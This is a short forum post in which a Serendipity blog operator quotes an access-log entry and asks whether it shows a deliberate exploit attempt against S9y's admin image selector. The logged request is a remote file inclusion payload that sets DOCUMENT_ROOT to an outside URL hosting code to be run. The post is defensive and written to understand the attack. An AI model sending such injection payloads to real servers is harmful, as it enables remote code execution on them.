Code: Select all
193.63.251.123 - - [08/Sep/2009:15:04:02 +0200] "GET /serendipity_admin_image_sel...em&serendipity%5bimage%5d=639/?_SERVER%5bDOCUMENT_ROOT%5d=http://shop.kbench.com/xml/ec.txt%3f HTTP/1.1" 404 348 "-" "libwww-perl/5.79"
Seems like an exploit try you often see but the selectiv access on serendipity_admin_image_sel...em makes me wonder if it's a dedicated try to exploit S9y as it is nowhere linked. On the other hand, the image_selector which is obviously meant is written incorrectly which would speak against a specific exploit.
Anyone?